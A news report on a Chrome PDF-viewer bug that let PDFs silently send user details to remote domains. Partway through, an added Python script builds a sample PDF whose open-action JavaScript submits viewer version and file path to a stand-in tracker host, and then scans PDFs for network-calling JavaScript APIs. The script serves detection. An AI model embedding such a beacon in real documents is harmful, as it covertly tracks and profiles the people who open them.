Google Chrome bug used in the wild to collect user data via PDF files


A security firm said this week that it discovered PDF documents exploiting what the company called a Google Chrome browser "zero-day." The vulnerability allowed attackers to collect data from users who opened PDF files inside Chrome's built-in PDF viewer.
Exploit detection service EdgeSpot, the company that found the files, says the PDF documents would contact a remote domain with information on the user's device, such as the IP address, OS version, Chrome version, and the path of the PDF file on the user's computer.
This phone-home behavior did not occur when researchers opened the same PDF files in desktop PDF viewer apps such as Adobe Reader; it was limited to Chrome.
The company said it spotted two distinct sets of malicious PDF files exploiting this Chrome bug, with one series of files being circulated circa October 2017, and the second set in September 2018.
The first batch of malicious PDF files sent user data back to the "readnotify.com" domain, while the second sent it to "zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net," researchers said.
There was no additional malicious code in the PDF files that EdgeSpot discovered. However, collecting data on users who open a PDF file can aid attackers in fine-tuning future attacks and exploits.
But in a conversation with ZDNet after the publication of this story, Mac malware security expert Patrick Wardle explained that the first batch of files that EdgeSpot detected weren't meant to be malicious in nature, despite exploiting the Chrome bug. He said they were assembled using ReadNotify's PDF tracking service that lets users track when someone views their PDF files, a service that has been around since 2010.
"What the researchers 'uncovered' is just a document tagged by ReadNotify," Wardle told us, "but yes, Chrome should alert the user."
Peeked at PDF & extracted JS 📝
"0day": Chrome doesn't alert when PDF submits data to remote server (can track PDF opens & survey/geolocate user)
How: via app.openDoc API & FDFs.
btw https://t.co/HA3qTcMEF7 has been doing this since (circa) 2010🤐🙈 pic.twitter.com/HUQZJApQGg
https://t.co/bH4YY0xPtL
— patrick wardle (@patrickwardle) February 28, 2019
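The behavior EdgeSpot and Wardle describe above is PDF-embedded JavaScript that runs on open and submits viewer details to a remote URL (via app.openDoc or an FDF submission). As an added example, not code from EdgeSpot, Wardle or this article, the Python script below builds a constructed PDF carrying such a beacon and then scans PDFs for it: it pulls every /JS value out of the file (literal strings and FlateDecode streams), looks for network-capable Acrobat JavaScript calls, and extracts the hosts they would contact. The tracker host tracker.example.invalid, the sample JavaScript and the argument forms of submitForm are assumptions of this example; the scanner keys only on API names and URLs, so it does not depend on them.

```python
"""Find PDF JavaScript that phones home (added example; every sample here is constructed)."""
import re
import zlib
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Acrobat JavaScript calls that can make a viewer contact a remote host: app.openDoc with a
# URL/FDF target is the one Wardle named, submitForm is FDF submission, the rest are other
# network-capable calls from the same API (assumed list; extend as needed).
NETWORK_APIS = ("app.openDoc", "submitForm", "app.launchURL", "getURL", "Net.HTTP")
AUTO_TRIGGERS = (b"/OpenAction", b"/AA")  # actions that fire with no user interaction
_URL = re.compile(r"https?://[A-Za-z0-9._~:/?#@!$&'*+,;=%-]+")
_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t"}

# Constructed tracking beacon (host and argument forms are assumptions of this example).
TRACKER_JS = (
    'var info = app.viewerType + "/" + app.viewerVersion + "|" + this.path;'
    'this.submitForm({cURL: "http://tracker.example.invalid/collect.fdf?v="'
    ' + encodeURIComponent(info), cSubmitAs: "FDF"});'
)

def _read_literal(pdf: bytes, start: int) -> bytes:
    """Body of the literal string opening at pdf[start]: balanced nested parentheses may
    appear unescaped and backslash escapes are resolved (ISO 32000-1, section 7.3.4.2)."""
    depth, i, out = 1, start + 1, bytearray()
    while i < len(pdf) and depth:
        c = pdf[i:i + 1]
        if c == b"\\":  # escape sequence: emit the escaped character itself
            out += _ESCAPES.get(pdf[i + 1:i + 2], pdf[i + 1:i + 2])
            i += 2
            continue
        depth += (c == b"(") - (c == b")")
        if depth:  # the closing paren of the string itself is not part of the body
            out += c
        i += 1
    return bytes(out)

def _read_stream(pdf: bytes, num: int, gen: int) -> Optional[bytes]:
    """Data of indirect stream object `num gen` (its /Length bytes), inflated if FlateDecode."""
    m = re.search(rb"(?<![0-9])%d\s+%d\s+obj(.*?)stream\r?\n" % (num, gen), pdf, re.DOTALL)
    length = m and re.search(rb"/Length\s+(\d+)", m.group(1))
    if not length:
        return None
    data = pdf[m.end():m.end() + int(length[1])]
    return zlib.decompress(data) if b"/FlateDecode" in m.group(1) else data

def extract_javascript(pdf: bytes) -> List[str]:
    """Every /JS value in the file, whether a literal string or an indirect stream."""
    scripts = []
    for m in re.finditer(rb"/JS\s*", pdf):
        pos = m.end()
        if pdf[pos:pos + 1] == b"(":
            scripts.append(_read_literal(pdf, pos).decode("latin-1"))
            continue
        ref = re.match(rb"(\d+)\s+(\d+)\s+R", pdf[pos:pos + 32])
        data = _read_stream(pdf, int(ref[1]), int(ref[2])) if ref else None
        if data is not None:
            scripts.append(data.decode("latin-1"))
    return scripts

def scan_pdf(pdf: bytes) -> Dict[str, object]:
    """Flag a PDF whose embedded JavaScript can reach the network, and list the hosts."""
    scripts = extract_javascript(pdf)
    apis = sorted({api for s in scripts for api in NETWORK_APIS if api in s})
    urls = sorted({u for s in scripts for u in _URL.findall(s)})
    hosts = sorted({h for h in (urlparse(u).hostname for u in urls) if h})
    return {"javascript_count": len(scripts), "network_apis": apis, "urls": urls,
            "hosts": hosts, "auto_trigger": any(t in pdf for t in AUTO_TRIGGERS),
            "phone_home": bool(apis and urls)}

def build_sample_pdf(js: str, as_stream: bool = False) -> bytes:
    """Minimal one-page PDF whose /OpenAction runs `js` on open: constructed test input
    for the scanner, written with a valid xref so it also opens in a real viewer."""
    raw = js.encode("latin-1")
    if as_stream:  # JS hidden inside a FlateDecode stream
        deflated = zlib.compress(raw)
        action = b"<< /S /JavaScript /JS 5 0 R >>"
        extra = [b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(deflated)
                 + deflated + b"\nendstream"]
    else:  # JS as a literal string, with backslashes and parentheses escaped
        literal = raw.replace(b"\\", b"\\\\").replace(b"(", b"\\(").replace(b")", b"\\)")
        action, extra = b"<< /S /JavaScript /JS (" + literal + b") >>", []
    objs = [b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
            b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
            b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>", action] + extra
    out, offsets = bytearray(b"%PDF-1.7\n"), []
    for n, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % n + body + b"\nendobj\n"
    xref = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    out += b"".join(b"%010d 00000 n \n" % off for off in offsets)
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref)
    return bytes(out)

if __name__ == "__main__":
    import json, sys
    target = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pdf(TRACKER_JS)
    print(json.dumps(scan_pdf(target), indent=2))
```

Run it with a file path to scan a real sample, or with no argument to scan its own constructed beacon. A hit on network_apis together with a URL is at minimum a tracking beacon, and auto_trigger tells you it fires without a click; the scan only finds the code, it does not reproduce the reported difference between Chrome's viewer, which sent the request silently, and Adobe Reader, which did not. It handles literal-string /JS values and plain or FlateDecode streams in a file without object streams; for samples that use hex strings, object streams or other filters, decode them first with a full parser such as pdf-parser.py or peepdf and scan the output.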
There is no information available on the second set of PDF files (the ones circulated in September 2018) or their nature: whether they were assembled by a threat actor, were just tests, or were generated for benign user-tracking purposes.
For its part, EdgeSpot said it notified Google over the Christmas holiday last year, when it first discovered the documents. The Chrome team acknowledged the vulnerability and promised a fix for late April.
"We decided to release our finding prior to the patch because we think it's better to give the affected users a chance to be informed/alerted of the potential risk, since the active exploits/samples are in the wild while the patch is not near away," researchers said in a blog post yesterday.
The blog post also contains samples and indicators of compromise (IOCs) for the PDF files the company discovered.
Until a patch is out, EdgeSpot is recommending that users either use a desktop app to view PDF files or disable their internet connection while they open PDF documents in Chrome.
In unrelated research, but also connected to the world of PDF documents, earlier this week, security researchers revealed vulnerabilities that allowed them to fake signatures on 21 of 22 desktop PDF viewer apps and 5 out of 7 online PDF digital signing services.
Article updated with Wardle's analysis. Title updated accordingly.